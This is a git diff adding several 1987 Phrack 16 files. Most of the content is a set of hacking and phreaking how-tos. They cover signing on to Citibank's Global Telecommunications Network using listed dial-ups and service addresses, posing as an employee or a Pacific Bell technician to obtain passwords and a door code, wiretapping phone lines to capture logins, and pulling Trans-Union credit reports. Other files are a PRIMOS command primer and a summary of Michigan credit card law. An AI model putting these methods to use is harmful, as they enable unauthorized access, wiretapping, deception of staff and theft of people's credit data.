||||
----------------------------
|
||||
PRIMOS has several commands to control and access files and file contents.
|
||||
These commands can be used to list the contents of files and directories, and
|
||||
to copy, add, delete, edit, and print the contents of files. The capitalized
|
||||
letters of each are deleted. A LIST must be enclosed in parenthesis.
|
||||
|
||||
Close arg ....Closes the file specified by 'arg'. 'Arg' could also be
|
||||
a list of PRIMOS file unit numbers, or the word 'ALL' which
|
||||
closes all open files and units.
|
||||
|
||||
LIMITS ....Displays information about the login account, including
|
||||
information about resources allocated and used, grantor, and
|
||||
expiration date.
|
||||
|
||||
Edit Access ....Edits the Access rights for the named directories and
|
||||
files.
|
||||
|
||||
CName arg1 arg2 ....Changes the Name of 'arg1' to 'arg2'. The arguments can
|
||||
be files or directories.
|
||||
|
||||
LD ....The List Directory command has several arguments that
|
||||
allow for controlled listing format and selection of entries.
|
||||
|
||||
Attach arg ....allows you to Attach to the directory 'arg' with the
|
||||
access rights specified in the directory Access Control List.
|
||||
|
||||
DOWN <arg> ....allows you to go 'DOWN into' a sub-ufd (directory). You
|
||||
can specify which one of several sub-ufds to descend into
|
||||
with the optional 'arg'.
|
||||
|
||||
UP <arg> ....allows you to go 'UP into' a higher ufd (directory). You
|
||||
can specify which one of several to climb into with the
|
||||
optional 'arg'.
|
||||
|
||||
WHERE ....Displays what the current directory attach point is and
|
||||
your access rights.
|
||||
|
||||
CREATE arg ....CREATES a new sub-directory as specified by 'arg'.
|
||||
|
||||
COPY arg1 arg2 ....COPIES the file or directory specified by 'arg1' into a
|
||||
file by the same name specified by 'arg2'. Both 'arg1' and
|
||||
'arg2' can be filename with the SPOOL command, whose format
|
||||
is:
|
||||
|
||||
SPOOL filename -AT destination
|
||||
where filename is the name of the file you want printed, and
|
||||
destination is the name of the printer where you want the
|
||||
file printed. For example if you want the file 'HACK.FTN'
|
||||
printed at the destination 'LIB' type:
|
||||
|
||||
SPOOL HACK.FTN -AT LIB
|
||||
|
||||
PRIMOS then gives you some information telling you that the file named was
|
||||
SPOOLed and the length of the file in PRIMOS records. To see the entries in
|
||||
the SPOOL queue, type:
|
||||
|
||||
SPOOL -LIST
|
||||
|
||||
PRIMOS then lists out all the files waiting to be printed on the printers on
|
||||
your login system. Also included in this information will be the filename of
|
||||
the files waiting to print, the login account name of the user who SPOOLed the
|
||||
file, the time that the file was SPOOLed, the size of the file in PRIMOS
|
||||
records, and the printer name where the file is to print.
|
||||
|
||||
|
||||
Changing The Password Of An Account:
|
||||
------------------------------------
|
||||
If you wish to change the password to your newly acquired account you must use
|
||||
the 'CPW' command (Change PassWord). To do this enter the current password on
|
||||
the command line followed by RETURN. PRIMOS will then prompt you for your
|
||||
desired NEW password and then ask you to confirm your NEW password. To change
|
||||
your password of 'JOE' to 'SCHMOE' then type:
|
||||
|
||||
OK, (system)
|
||||
CPW JOE (you)
|
||||
New Password? (system)
|
||||
|
||||
You can save a copy of your terminal session by using the COMO (COMmand
|
||||
Output) command. When you type:
|
||||
|
||||
COMO filename
|
||||
|
||||
Everything which is typed or displayed on your terminal is saved (recorded)
|
||||
into the filename on the command line (filename). If a file by the same name
|
||||
exists, then that file will be REPLACED with NO WARNING GIVEN! When you have
|
||||
finished doing whatever it was you wanted a hardcopy of, you type:
|
||||
|
||||
COMO -End
|
||||
|
||||
which will stop recording your session and will close the COMO file. You can
|
||||
now print the COMO file using the SPOOL command as stated earlier.
|
||||
|
||||
Conclusion:
|
||||
-----------
|
||||
This concludes this first file on PRIMOS. Please remember this file is
|
||||
written primarily for beginners, and some of the text may have seemed BORING!
|
||||
However, this filewaswrittenin a verbose fashion to FULLYINTRODUCEPRIMOS
|
||||
to beginners. Part II will deal with more the several languages on PRIMOS and
|
||||
some other commands.
|
||||
|
||||
|
||||
Author's Endnote:
|
||||
-----------------
|
||||
I would like to thank the following people for the help in writing this file:
|
||||
|
||||
AMADEUS (an oldie who is LONG GONE!)
|
||||
The University Of Kentucky
|
||||
State University Of New York (SUNY) Primenet
|
||||
|
||||
And countless others.....
|
||||
|
||||
Questions, threats, or suggestions to direct towards me, I can be found on any
|
||||
of the following:
|
||||
|
||||
The Freeworld ][.........301-668-7657
|
||||
Digital Logic............305-395-6906
|
||||
The Executive Inn........915-581-5146
|
||||
OSUNY BBS................914-725-4060
|
||||
|
||||
-=*< Cosmos Kid >*=-
|
||||
|
||||
========================================
|
248
phrack16/4.txt
Normal file
248
phrack16/4.txt
Normal file
|
@ -0,0 +1,248 @@
|
|||
===== Phrack Magazine presents Phrack 16 =====
|
||||
===== File 4 of 12 =====
|
||||
|
||||
|
||||
Hacking the Global Telecommunications Network
|
||||
Researched and written by: The Kurgan
|
||||
Compiled on 10/5/87
|
||||
|
||||
|
||||
Network Procedure Differences
|
||||
|
||||
The Global Telecommunications Network (GTN) is Citibanks's international data
|
||||
network, which allows Citicorp customers and personnel to access Citibank's
|
||||
worldwide computerized services.
|
||||
|
||||
Two different sign on procedures exist: Type A and Type B. All users, except
|
||||
some in the U.S., must use Type B. (U.S. users: the number you dial into
|
||||
and the Welcome Banner you receive determine what sign-on procedure to
|
||||
follow.) Welcome banners are as follows:
|
||||
|
||||
TYPE A:
|
||||
WELCOME TO CITIBANK. PLEASE SIGN ON.
|
||||
XXXXXXXX
|
||||
|
||||
@
|
||||
PASSWORD =
|
||||
|
||||
@
|
||||
|
||||
TYPE B:
|
||||
PLEASE ENTER YOUR ID:-1->
|
||||
PLEASE ENTER YOUR PASSWORD:-2->
|
||||
|
||||
CITICORP (CITY NAME). KEY GHELP FOR HELP.
|
||||
XXX.XXX
|
||||
PLEASE SELECT SERVICE REQUIRED.-3->
|
||||
|
||||
|
||||
Type A User Commands
|
||||
|
||||
User commands are either instructions or information you send to the network
|
||||
for it to follow. The commands available are listed below.
|
||||
|
||||
User Action: Purpose:
|
||||
|
||||
@ (CR) To put you in command mode (mode in which you can put
|
||||
your currently active service on hold and ask the network
|
||||
for information, or log-off the service). (NOTE: This
|
||||
symbol also serves as the network prompt; see Type A
|
||||
messages.)
|
||||
|
||||
BYE (CR) To leave service from command mode.
|
||||
|
||||
Continue (CR) To return to application from command mode (off hold)
|
||||
|
||||
D (CR) To leave service from command mode.
|
||||
|
||||
ID To be recognized as a user by the network (beginning of
|
||||
sign on procedure), type ID, then a space and your
|
||||
assigned network ID. (Usually 5 or 6 characters long)
|
||||
|
||||
Status (CR) To see a listing of network address (only from @
|
||||
prompt). You need this address when "reporting a
|
||||
problem."
|
||||
|
||||
Type A messages
|
||||
|
||||
The network displays a variety of messages on your screen which either require
|
||||
a user command or provide you with information.
|
||||
|
||||
Screen shows: Explanation:
|
||||
|
||||
@ Network prompt -- request for Network ID.
|
||||
|
||||
BAD PASSWORD Network does not except your password.
|
||||
|
||||
<address> BUSY The address is busy, try back later.
|
||||
|
||||
|
||||
WELCOME TO CITIBANK. Network welcome banner. Second line provides address
|
||||
PLEASE SIGN ON. # to be used when reporting "problems."
|
||||
XXX.XXX
|
||||
|
||||
<address> ILLEGAL You typed in an address that doesn't exist.
|
||||
|
||||
<address> CONNECTED Your connection has been established.
|
||||
|
||||
DISCONNECTED Your connect has been disconnected.
|
||||
|
||||
NOT CONNECTED You're not connected to any service at the time.
|
||||
|
||||
NUI REQUIRED Enter your network user ID.
|
||||
|
||||
PASSWORD = Request for your assigned password.
|
||||
|
||||
STILL CONNECTED You are still connected to the service you were using.
|
||||
|
||||
? Network doesn't understand your entry.
|
||||
|
||||
|
||||
Type B User Commands and Messages
|
||||
|
||||
Since the Type B procedure is used with GTN dial-ups, it requires fewer
|
||||
commands to control the network. There is only 1 Type B command. Break plus
|
||||
(CR) allows you to retain connection to one service, and connect with another.
|
||||
|
||||
|
||||
Screen Shows: Explanation:
|
||||
|
||||
CITICORP (CITY NAME). Network Welcome banner. Type in service address.
|
||||
PLEASE SELECT SERVICE
|
||||
|
||||
COM Connection made.
|
||||
|
||||
DER The port is closed out of order, or no open routes are
|
||||
available.
|
||||
|
||||
DISCONNECTED You have disconnected from the service and the network.
|
||||
|
||||
ERR Error in service selected.
|
||||
|
||||
INV Error in system.
|
||||
|
||||
MOM Wait, the connection is being made.
|
||||
|
||||
NA Not authorized for this service.
|
||||
|
||||
NC Circuits busy, try again.
|
||||
|
||||
NP Check service address.
|
||||
|
||||
OCC Service busy, try again.
|
||||
|
||||
|
||||
Sign-on Procedures:
|
||||
|
||||
There are two types of sign on procedures. Type A and Type B.
|
||||
|
||||
|
||||
Type A:
|
||||
|
||||
To log onto a system with type A logon procedure, the easiest way is through
|
||||
Telenet. Dial your local Telenet port. When you receive the "@" prompt, type
|
||||
in the Type-A service address (found later in the article) then follow the
|
||||
instructions from there on.
|
||||
|
||||
Type-B:
|
||||
Dial the your GTN telephone #, then hit return twice. You will then see:
|
||||
|
||||
"PLEASE ENTER YOUR ID:-1->"
|
||||
|
||||
Type in a network ID number and hit return.
|
||||
|
||||
You will then see
|
||||
|
||||
"PLEASE ENTER YOUR PASSWORD:-2->"
|
||||
|
||||
Type in Network Password and hit return.
|
||||
|
||||
Finally you will see the "CITICORP (city name)" welcome banner, and it
|
||||
will ask you to select the service you wish to log onto. Type the address and
|
||||
hit return. (A list of addresses will be provided later)
|
||||
|
||||
Trouble Shooting:
|
||||
|
||||
If you should run into any problems, the Citicorp personnel will gladly
|
||||
help their "employees" with any questions. Just pretend you work for Citibank
|
||||
and they will give you a lot. This has been tried and tested. Many times,
|
||||
when you attempt to log on to a system and you make a mistake with the
|
||||
password, the system will give you a number to call for help. Call it and
|
||||
tell them that you forgot your pass or something. It usually works, since
|
||||
they don't expect people to be lying to them. If you have any questions about
|
||||
the network itself, call 305-975-5223. It is the Technical Operations Center
|
||||
(TOC) in Pompano, Florida.
|
||||
|
||||
Dial-Ups:
|
||||
|
||||
The following list of dial-ups is for North America. I have a list of
|
||||
others, but I don't think that they would be required by anyone. Remember:
|
||||
Dial-ups require Type-B log-on procedure. Type-A is available on systems
|
||||
accessible through Telenet.
|
||||
|
||||
Canada Toronto 416-947-2992 (1200 Baud V.22 Modem Standard)
|
||||
U.S.A. Los Angeles 213-629-4025 (300/1200 Baud U.S.A. Modem Standard)
|
||||
Jersey City 201-798-8500
|
||||
New York City 212-269-1274
|
||||
212-809-1164
|
||||
|
||||
Service Addresses:
|
||||
|
||||
The following is a VERY short list of just some of the 100's of service
|
||||
addresses. In a later issue I will publish a complete list.
|
||||
|
||||
Application Name: Type-A Type-B
|
||||
|
||||
CITIADVICE 2240001600 CADV
|
||||
CITIBANKING ATHENS 2240004000 :30
|
||||
CITIBANKING PARIS 2240003300 :33
|
||||
CITIBANKING TOKYO 2240008100 :81
|
||||
CITICASH MANAGER
|
||||
INTERNATIONAL 1 (NAFG CORP) 2240001200 CCM1
|
||||
INTERNATIONAL 7 (DFI/WELLS FARGO) 2240013700 CCM7
|
||||
COMPMARK ON-LINE 2240002000 CS4
|
||||
ECONOMIC WEEK ON-LINE 2240011100 FAME1
|
||||
INFOPOOL/INFOTEXT 2240003800 IP
|
||||
|
||||
EXAMPLE OF LOGON PROCEDURE:
|
||||
|
||||
THE FOLLOWING IS THE BUFFERED TEXT OF A LOG-ON TO CITIBANKING PARIS THROUGH
|
||||
TELENET.
|
||||
|
||||
|
||||
|
||||
CONNECT 1200
|
||||
TELENET
|
||||
216 13.41
|
||||
|
||||
TERMINAL=VT100
|
||||
|
||||
@2240003300
|
||||
|
||||
223 90331E CONNECTED
|
||||
|
||||
ENTER TYPE NUMBER OR RETURN
|
||||
|
||||
TYPE B IS BEEHIVE DM20
|
||||
TYPE 1 IS DEC VT100
|
||||
TYPE A IS DEC VT100 ADV VIDEO
|
||||
TYPE 5 IS DEC VT52
|
||||
TYPE C IS CIFER 2684
|
||||
TYPE 3 IS LSI ADM 3A
|
||||
TYPE L IS LSI ADM 31
|
||||
TYPE I IS IBM 3101
|
||||
TYPE H IS HP 2621
|
||||
TYPE P IS PERKIN ELMER 1200
|
||||
TYPE K IS PRINTER KEYBOARD
|
||||
TYPE M IS MAI BASIC 4
|
||||
TYPE T IS TELEVIDEO 9XX
|
||||
TYPE V IS VOLKER CRAIG 4404
|
||||
TYPE S IS SORD MICRO WITH CBMP
|
||||
RELEASE BSC9.5 - 06JUN85
|
||||
FOR 300 BAUD KEY ! AND CARRIAGE RETURN
|
||||
CONFIG. K1.1-I11H-R-C-B128
|
||||
ENTER TYPE NUMBER OR RETURN K
|
||||
|
||||
CONNECTED TO CITIBANK PARIS - CBP1 ,PORT 5
|
||||
|
||||
Have fun with this info, and remember, technology will rule in the end.
|
142
phrack16/5.txt
Normal file
142
phrack16/5.txt
Normal file
|
@ -0,0 +1,142 @@
|
|||
===== Phrack Magazine presents Phrack 16 =====
|
||||
===== File 5 of 12 =====
|
||||
|
||||
----------------------------------------------------------------------------
|
||||
| The Laws Governing Credit Card Fraud |
|
||||
| |
|
||||
| Written by Tom Brokaw |
|
||||
| September 19, 1987 |
|
||||
| |
|
||||
| Written exclusively for: |
|
||||
| Phrack Magazine |
|
||||
| |
|
||||
----------------------------------------------------------------------------
|
||||
(A Tom Brokaw/Disk Jockey Law File Production)
|
||||
|
||||
|
||||
Introduction:
|
||||
------------
|
||||
|
||||
In this article, I will try to explain the laws concerning the illegal
|
||||
use of credit cards. Explained will be the Michigan legislative view on the
|
||||
misuse and definition of credit cards.
|
||||
|
||||
|
||||
Definition:
|
||||
----------
|
||||
|
||||
Well, Michigan Law section 157, defines a credit card as "Any instrument
|
||||
or device which is sold, issued or otherwise distributed by a business
|
||||
organization identified thereon for obtaining goods, property, services or
|
||||
anything of value." A credit card holder is defined as: 1) "The person or
|
||||
organization who requests a credit card and to whom or for whose benefit a
|
||||
credit card is subsequently issued" or 2) "The person or organization to whom
|
||||
a credit card was issued and who uses a credit card whether the issuance of
|
||||
the credit card was requested or not." In other words, if the company or
|
||||
individual is issued a card, once using it, they automatically agree to all
|
||||
the laws and conditions that bind it.
|
||||
|
||||
|
||||
Stealing, Removing, Retaining or Concealment:
|
||||
--------------------------------------------
|
||||
|
||||
Michigan Law states, that it is illegal to "steal, knowingly take or
|
||||
remove a credit card from a card holder." It also states that it is wrongful
|
||||
to "conceal a credit card without the consent of the card holder." Notice
|
||||
that it doesn't say anything about carbons or numbers acquired from BBSes,
|
||||
but I think that it could be considered part of the laws governing the access
|
||||
of a persons account without the knowledge of the cardholder, as described
|
||||
above.
|
||||
|
||||
|
||||
Possession with Intent to Circulate or Sell
|
||||
-------------------------------------------
|
||||
|
||||
The law states that it is illegal to possess or have under one's control,
|
||||
or receive a credit card if his intent is to circulate or sell the card. It
|
||||
is also illegal to deliver, circulate or sell a credit card, knowing that such
|
||||
a possession, control or receipt without the cardholders consent, shall be
|
||||
guilty of a FELONY. Notice again, they say nothing about possession of
|
||||
carbons or numbers directly. It also does not clearly state what circulation
|
||||
or possession is, so we can only stipulate. All it says is that possession of
|
||||
a card (material plastic) is illegal.
|
||||
|
||||
|
||||
Fraud, forgery, material alteration, counterfeiting.
|
||||
----------------------------------------------------
|
||||
|
||||
However, it might not be clearly illegal to possess a carbon or CC
|
||||
number. It IS illegal to defraud a credit card holder. Michigan law states
|
||||
that any person who, with intent to defraud, forge, materially alter or
|
||||
counterfeit a credit card, shall be guilty of a felony.
|
||||
|
||||
|
||||
Revoked or cancelled card, use with intent to defraud.
|
||||
------------------------------------------------------
|
||||
|
||||
This states that "Any person who knowingly and with intent to defraud for
|
||||
the purpose of obtaining goods, property or services or anything of value on a
|
||||
credit card which has been revoked or cancelled or reported stolen by the
|
||||
issuer or issuee, has been notified of the cancellation by registered or
|
||||
certified mail or by another personal service shall be fined not more than
|
||||
$1,000 and not imprisoned not more than a year, or both. However, it does not
|
||||
clearly say if it is a felony or misdemeanor or civil infraction. My guess is
|
||||
that it would be dependant on the amount and means that you used and received
|
||||
when you defraud the company. Usually, if it is under $100, it is a
|
||||
misdemeanor but if it is over $100, it is a felony. I guess they figure that
|
||||
you should know these things.
|
||||
|
||||
|
||||
The People of The State of Michigan vs. Anderson (possession)
|
||||
------------------------------------------------
|
||||
|
||||
On April 4, 1980, H. Anderson attempted to purchase a pair of pants at
|
||||
Danny's Fashion Shops, in the Detroit area. He went up to the cashier to pay
|
||||
for the pants and the cashier asked him if he had permission to use the credit
|
||||
card. He said "No, I won it last night in a card game". The guy said that I
|
||||
could purchase $50 dollars worth of goods to pay back the debt. At the same
|
||||
time, he presumed the card to be a valid one and not stolen. Well, as it
|
||||
turned out it was stolen but he had no knowledge of this. Later, he went to
|
||||
court and pleased guilty of attempted possession of a credit card of another
|
||||
with intent or circulate or sell the same. At the guilty hearings, Mr.
|
||||
Anderson stated that the credit card that he attempted to use had been
|
||||
acquired by him in payment of a gambling debt and assumed that the person was
|
||||
the owner. The trial court accepted his plea of guilty. At the sentencing,
|
||||
Mr. Anderson, denied that he had any criminal intent. Anderson appealed the
|
||||
decision stating that the court had erred by accepting his plea of guilty on
|
||||
the basis of insufficient factual data. Therefore, the trial court should not
|
||||
have convicted him of attempted possession and reversed the charges.
|
||||
|
||||
|
||||
The People of the State of Michigan vs. Willie Dockery
|
||||
------------------------------------------------------
|
||||
|
||||
On June 23, 1977, Willie Dockery attempted to purchase gas at a Sears gas
|
||||
station by using a stolen credit card. The attendant noticed that his
|
||||
driver's license picture was pasted on and notified the police. Dockery
|
||||
stated that he had found the credit card and the license at an intersection,
|
||||
in the city of Flint. He admitted that he knowingly used the credit card and
|
||||
driver's license without the consent of the owner but he said that he only had
|
||||
purchased gasoline on the card. It turns out that the credit card and
|
||||
driver's license was stolen from a man, whose grocery store had been robbed.
|
||||
Dockery said that he had no knowledge of the robbery and previous charges on
|
||||
the cardwhich totalled$1,373.21. He admitted that he did paste his picture
|
||||
on the driver's license. Butagain the court screws up, they receive evidence
|
||||
that the defendant had a record of felonies dating back to when he was sixteen
|
||||
and then assumed that he was guilty on the basis of his prior offenses. The
|
||||
judge later said that the present sentence could not stand in this court so
|
||||
the case was referred to another court.
|
||||
|
||||
|
||||
Conclusion
|
||||
----------
|
||||
|
||||
I hope that I have given you a better understanding about the law, that
|
||||
considers the illegal aspects of using credit cards. All this information was
|
||||
taken from The Michigan Compiled Laws Annotated Volume 754.157a-s and from The
|
||||
Michigan Appeals Report.
|
||||
|
||||
In my next file I will talk about the laws concerning Check Fraud.
|
||||
|
||||
|
||||
-Tom Brokaw
|
197
phrack16/6.txt
Normal file
197
phrack16/6.txt
Normal file
|
@ -0,0 +1,197 @@
|
|||
===== Phrack Magazine presents Phrack 16 =====
|
||||
===== File 6 of 12 =====
|
||||
|
||||
******************************************************************************
|
||||
* *
|
||||
* Tapping Telephone Lines *
|
||||
* *
|
||||
* Voice or Data *
|
||||
* *
|
||||
* For Phun, Money, and Passwords *
|
||||
* *
|
||||
* Or How to Go to Jail for a Long Time. *
|
||||
* *
|
||||
******************************************************************************
|
||||
|
||||
Written by Agent Steal 08/87
|
||||
|
||||
|
||||
Included in this file is...
|
||||
|
||||
* Equipment needed
|
||||
|
||||
* Where to buy it
|
||||
|
||||
* How to connect it
|
||||
|
||||
* How to read recorded data
|
||||
|
||||
|
||||
But wait!! There's more!!
|
||||
|
||||
* How I found a Tymnet node
|
||||
|
||||
* How I got in
|
||||
|
||||
|
||||
|
||||
*************
|
||||
THE EQUIPMENT
|
||||
*************
|
||||
|
||||
First thing you need is an audio tape recorder. What you will be
|
||||
recording, whether it be voice or data, will be in an analog audio format.
|
||||
>From now on, most references will be towards data recording. Most standard
|
||||
cassette recorders will work just fine. However, you are limited to 1 hour
|
||||
recording time per side. This can present a problem in some situations. A
|
||||
reel to reel can also be used. The limitations here are size and availability
|
||||
of A.C. Also, some reel to reels lack a remote jack that will be used to
|
||||
start and stop the recorder while the line is being used. This may not
|
||||
present a problem. More later. The two types of recorders I would advise
|
||||
staying away from (for data) are the micro cassette recorders and the standard
|
||||
cassette recorders that have been modified for 8 to 10 hour record time. The
|
||||
speed of these units is too unstable. The next item you need, oddly enough,
|
||||
is sold by Radio Shack under the name "Telephone recording control" part
|
||||
# 43-236 $24.95. See page 153 of the 1987 Radio Shack catalog.
|
||||
|
||||
|
||||
|
||||
*****************
|
||||
HOW TO CONNECT IT
|
||||
*****************
|
||||
|
||||
The Telephone recording control (TRC) has 3 wires coming out of it.
|
||||
|
||||
#1 Telco wire with modular jack. Cut this and replace with alligator clips.
|
||||
|
||||
#2 Audio wire with miniature phone jack (not telephone). This plugs
|
||||
into the microphone level input jack of the tape recorder.
|
||||
|
||||
#3 Audio wire with sub miniature phone jack. This plugs into the "REM"
|
||||
or remote control jack of the tape recorder.
|
||||
|
||||
Now all you need to do is find the telephone line, connect the alligator
|
||||
clips, turn the recorder on, and come back later. Whenever the line goes off
|
||||
hook, the recorder starts. It's that simple.
|
||||
|
||||
|
||||
|
||||
****************
|
||||
READING THE DATA
|
||||
****************
|
||||
|
||||
This is the tricky part. Different modems and different software respond
|
||||
differently but there are basics. The modem should be connected as usual to
|
||||
the telco line and computer. Now connect the speaker output of the tape
|
||||
player directly to the telephone line. Pick up the phone and dial the high
|
||||
side of a loop so your line doesn't make a lot of noise and garble up your
|
||||
data. Now, command your modem into the answer mode and press play. The tape
|
||||
should be lined up at the beginning of the recorded phone call, naturally, so
|
||||
you can see the login. Only one side of the transmission between the host and
|
||||
terminal can be monitored at a time. Going to the originate mode you will see
|
||||
what the host transmitted. This will include the echoes of the terminal. Of
|
||||
course the password will be echoed as ####### for example, but going to the
|
||||
answer mode will display exactly what the terminal typed. You'll understand
|
||||
when you see it. A couple of problems you might run into will be hum and
|
||||
garbage characters on the screen. Try connecting the speaker output to the
|
||||
microphone of the hand set in your phone. Use a 1 to 1 coupling transformer
|
||||
between the tape player input and the TRC audio output. These problems are
|
||||
usually caused when using A.C. powered equipment. The common ground of this
|
||||
equipment interferes with the telco ground which is D.C. based.
|
||||
|
||||
I was a little reluctant to write this file because I have been
|
||||
unsuccessful in reading any of the 1200 baud data I have recorded. I have
|
||||
spoke with engineers and techs. Even one of the engineers who designs modems.
|
||||
All of them agree that it IS possible, but can't tell me why I am unable to do
|
||||
this. I believe that the problems is in my cheap ass modem. One tech told me
|
||||
I needed a modem with phase equalization circuitry which is found in most
|
||||
expensive 2400 baud modems. Well one of these days I'll find $500 lying on
|
||||
the street and I'll have nothing better to spend it on! Ha! Actually, I have
|
||||
a plan and that's another file.....
|
||||
|
||||
I should point out one way of reading 1200 baud data. This should work in
|
||||
theory, however, I have not attempted it.
|
||||
|
||||
Any fully Hayes compatible modem has a command that shuts off the carrier
|
||||
and allows you to monitor the phone line. The command is ATS10. You would
|
||||
then type either answer or originate depending on who you wanted to monitor.
|
||||
It would be possible to write a program that records the first 300 or so
|
||||
characters then writes it to disk, thus allowing unattended operation.
|
||||
|
||||
**************
|
||||
HOW CRAZY I AM
|
||||
**************
|
||||
|
||||
PASSWORDS GALORE!!!!
|
||||
|
||||
After numerous calls to several Bell offices, I found the one that handled
|
||||
Tymnet's account. Here's a rough transcript:
|
||||
|
||||
Op: Pacific Bell priority customer order dept. How may I help you?
|
||||
Me: Good Morning, this is Mr. Miller with Tymnet Inc. We're interested in
|
||||
adding some service to our x town location.
|
||||
Op: I'll be happy to help you Mr. Miller.
|
||||
Me: I need to know how many lines we have coming in on our rotary and if we
|
||||
have extra pairs on our trunk. We are considering adding ten additional
|
||||
lines on that rotary and maybe some FX service.
|
||||
Op: Ok....What's the number this is referenced to?
|
||||
Me: xxx-xxx-xxxx (local node #)
|
||||
Op: Hold on a min....Ok bla, bla, bla.
|
||||
|
||||
Well you get the idea. Anyway, after asking her a few more unimportant
|
||||
questions I asked her for the address. No problem, she didn't even hesitate.
|
||||
Of course this could have been avoided if the CN/A in my area would give out
|
||||
addresses, but they don't, just listings. Dressed in my best telco outfit,
|
||||
Pac*Bell baseball cap, tool belt and test set, I was out the door. There it
|
||||
was, just an office building, even had a computer store in it. After
|
||||
exploring the building for awhile, I found it. A large steel door with a push
|
||||
button lock. Back to the phone. After finding the number where the service
|
||||
techs were I called it and talked to the tech manager.
|
||||
|
||||
Mgr: Hello this is Joe Moron.
|
||||
Me: Hi this is Mr. Miller (I like that name) with Pacific Bell. I'm down
|
||||
here at your x town node and we're having problems locating a gas leak
|
||||
in one of our Trunks. I believe our trunk terminates pressurization in
|
||||
your room.
|
||||
Mgr: I'm not sure...
|
||||
Me: Well could you have someone meet me down here or give me the entry code?
|
||||
Mgr: Sure the code is 1234.
|
||||
Me: Thanks, I'll let you know if there's any trouble.
|
||||
|
||||
|
||||
So, I ran home, got my VCR (stereo), and picked up another TRC from Trash
|
||||
Shack. I connected the VCR to the first two incoming lines on the rotary.
|
||||
One went to each channel (left,right). Since the volume of calls is almost
|
||||
consistent, it wasn't necessary to stop the recorder between calls. I just
|
||||
let it run. I would come back the next day to change the tape. The VCR was
|
||||
placed under the floor in case a tech happened to come by for maintenance.
|
||||
These nodes are little computer rooms with air conditioners and raised floors.
|
||||
The modems and packet switching equipment are all rack mounted behind glass.
|
||||
Also, most of the nodes are unmanned. What did I get? Well a lot of the
|
||||
logins were 1200, so I never found out what they were. Still have 'em on tape
|
||||
though! Also a large portion of traffic on both Tymnet and Telenet is those
|
||||
little credit card verification machines calling up Visa or Amex. The
|
||||
transaction takes about 30 secs and there are 100's on my tapes. The rest is
|
||||
as follows:
|
||||
|
||||
Easylink CompuServe Quantumlink 3Mmail
|
||||
PeopleLink Homebanking USPS Chrysler parts order
|
||||
Yamaha Ford Dow Jones
|
||||
|
||||
And a few other misc. systems of little interest. I'm sure if I was
|
||||
persistent, I'd get something a little more interesting. I spent several
|
||||
months trying to figure out my 1200 baud problem. When I went back down there
|
||||
the code had been changed. Why? Well I didn't want to find out. I was out
|
||||
of there! I had told a couple of people who I later found could not be
|
||||
trusted. Oh well. Better safe than sorry.
|
||||
|
||||
|
||||
**************************************
|
||||
|
||||
Well, if you need to reach me,try my VMS at 415-338-7000 box 8130. But no
|
||||
telling how long that will last. And of course there's always P-80 systems at
|
||||
304-744-2253. Probably be there forever. Thanks Scan Man, whoever you are.
|
||||
Also read my file on telco local loop wiring. It will help you understand how
|
||||
to find the line you are looking for. It should be called Telcowiring.Txt
|
||||
|
||||
<<< AGENT STEAL >>>
|
205
phrack16/7.txt
Normal file
205
phrack16/7.txt
Normal file
|
@ -0,0 +1,205 @@
|
|||
===== Phrack Magazine presents Phrack 16 =====
|
||||
===== File 7 of 12 =====
|
||||
|
||||
------------------------------------------------------------------------
|
||||
- The Disk Jockey -
|
||||
- presents: -
|
||||
- -
|
||||
- Reading Trans-Union Reports: -
|
||||
- A lesson in terms used -
|
||||
- (A 2af presentation) -
|
||||
------------------------------------------------------------------------
|
||||
|
||||
This file is dedicated to all the phreaks/hacks that were busted in the summer
|
||||
of 1987, perhaps one of the most crippling summers ever for us.
|
||||
|
||||
Preface:
|
||||
-------
|
||||
Trans-Union is a credit service much like CBI, TRW or Chilton, but offers
|
||||
more competitive rates, and is being used more and more by many credit
|
||||
checking agencies.
|
||||
|
||||
Logging in:
|
||||
----------
|
||||
Call one of the Trans Union dial-ups at 300,E,7,1, Half Duplex. Such a
|
||||
dial-up is 314-XXX-XXXX. After connecting, hit Ctrl-S. The system will echo
|
||||
back a 'GO ' and then awaits you to begin the procedure of entering the
|
||||
account and password, then mode, i.e.: S F1111,111,H,T. The system will
|
||||
then tell you what database you are logged on to, which is mostly
|
||||
insignificant for your use. To then pull a report, you would type the
|
||||
following: P JONES,JIM* 2600,STREET,CHICAGO,IL,60604** <Ctrl-S>. The name
|
||||
is Jim Jones, 2600 is his street address, street is the street name, Chicago
|
||||
is the city, IL is the state, 60604 is the zip.
|
||||
|
||||
The Report:
|
||||
----------
|
||||
The report will come out, and will look rather odd, with all types of
|
||||
notation. An example of a Visa card would be:
|
||||
|
||||
SUB NAME/ACCT# SUB# OPEND HICR DTRP/TERM BAL/MAX.DEL PAY.PAT MOP
|
||||
|
||||
CITIBANK B453411 3/87 $1000 9/87A $0 12111 R01
|
||||
4128XXXXXXXXX $1500 5/87 $120
|
||||
|
||||
|
||||
Ok, Citibank is the issuing bank. B453411 is their subscriber code. 3/87 is
|
||||
when the account was opened. HICR is the most that has been spent on that
|
||||
card. 9/87 is when the report was last updated (usually monthly if active).
|
||||
$1000 is the credit line. $0 is the current balance. 12111 is the payment
|
||||
pattern, where 1=pays in 30 days and 2=pays in 60 days. R01 means that it is a
|
||||
"Revolving" account, meaning that he can make payments rather than pay the
|
||||
entire bill at once. 4128-etc is his account number (card number). $1500 is
|
||||
his credit line. 5/87 is when he was late on a payment last. $120 is the
|
||||
amount that he was late with.
|
||||
|
||||
Here is a list of terms that will help you identify and understand the reports
|
||||
better:
|
||||
|
||||
ECOA Inquiry and Account Designators
|
||||
------------------------------------
|
||||
I Individual account for sole use of applicant
|
||||
C Joint spousal contractual liability
|
||||
A Authorized user of shared account
|
||||
P Participant in use of account that is neither C nor A
|
||||
S Co-signer, not spouse
|
||||
M Maker primarily liable for account, co-signer involved
|
||||
T Relationship with account terminated
|
||||
U Undesignated
|
||||
N Non-Applicant spouse inquiry
|
||||
|
||||
Remarks and FCBA Dispute Codes
|
||||
------------------------------
|
||||
AJP Adjustment pending
|
||||
BKL Bankruptcy loss
|
||||
CCA Consumer counseling account
|
||||
CLA Placed for collection
|
||||
CLO Closed to further purchases
|
||||
CTS Contact Subscriber
|
||||
DIS Dispute following resolution
|
||||
DRP Dispute resolution pending
|
||||
FCL Foreclosure
|
||||
MOV Moved, left no forwarding address
|
||||
ND No dispute
|
||||
PRL Profit and loss write-off
|
||||
RFN Account refinanced
|
||||
RLD Repossession, paid by dealer
|
||||
RLP Repossession, proceeds applied towards debt
|
||||
RPO Repossession
|
||||
RRE Repossession, redeemed
|
||||
RS Dispute resolved
|
||||
